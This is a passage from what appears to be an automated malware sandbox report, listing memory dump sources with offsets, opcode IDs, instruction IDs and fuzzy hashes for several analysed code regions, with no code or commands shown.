                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.916002064.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ea863f8c23a1e78eac9fd322e246c2a5bdd98a0f4fc9d73cf8098486f743331
                          • Instruction ID: 131accaced411d2d6487a4582b2f98dbab628b208ebb3715e3773ec0bb64219f
                          • Opcode Fuzzy Hash: 4ea863f8c23a1e78eac9fd322e246c2a5bdd98a0f4fc9d73cf8098486f743331
                          • Instruction Fuzzy Hash: 32212571504240DFDB11DF94D8C5FABBFA5FB88328F2485ADEA450B606C736E849CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.916021670.000000000110D000.00000040.00000001.sdmp, Offset: 0110D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ffe5f40a7d5b11178d1debd8c6b463b0dbd69235a86ea10232c4ff6076a92c9
                          • Instruction ID: 10bfb24505119354ff416804c28d216a57652702b74b87bad845cf9a8ed15dad
                          • Opcode Fuzzy Hash: 0ffe5f40a7d5b11178d1debd8c6b463b0dbd69235a86ea10232c4ff6076a92c9
                          • Instruction Fuzzy Hash: 19212571A04200DFDF1ACFD4E8C0B16BB65FB84354F20C96DD84D4B28AC7B6D846CAA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.916002064.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b4768df47c0c72382ddcae975d869f3692393f3f4822e6597009969694e5ed2
                          • Instruction ID: 3a5bda6e8b8f1561d162b63dd5c47390d1f4c1c0947f49626699ddec69b775a4
                          • Opcode Fuzzy Hash: 9b4768df47c0c72382ddcae975d869f3692393f3f4822e6597009969694e5ed2
                          • Instruction Fuzzy Hash: 2811D376504280CFCB42CF54D5C4B16BFB2FB88324F24C6ADD9494B656C33AD55ACBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.916002064.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b4768df47c0c72382ddcae975d869f3692393f3f4822e6597009969694e5ed2
                          • Instruction ID: 64c00a2372a012ff06caac982d766a8d2abc8a3753e3a36b3ef8eb9386e3e63a
                          • Opcode Fuzzy Hash: 9b4768df47c0c72382ddcae975d869f3692393f3f4822e6597009969694e5ed2
                          • Instruction Fuzzy Hash: 2A11B176504280CFDB12CF54D5C4B16BFB2FB84324F2486ADD9454B657C33AD45ACBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.916021670.000000000110D000.00000040.00000001.sdmp, Offset: 0110D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02bebd1ad1059daef5823bcb3edbd0edeb81f2d3ae348f5388953b032c5b855e
                          • Instruction ID: 1d89daa497b8e8cfd5d84bc9a33f83c5362c1a6a3f0004157db56ad39ae84426
                          • Opcode Fuzzy Hash: 02bebd1ad1059daef5823bcb3edbd0edeb81f2d3ae348f5388953b032c5b855e
                          • Instruction Fuzzy Hash: 7E11D075904280CFCB16CF54E5C4B16FF62FB44324F24C6A9D8094B69AC37AD44ACBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions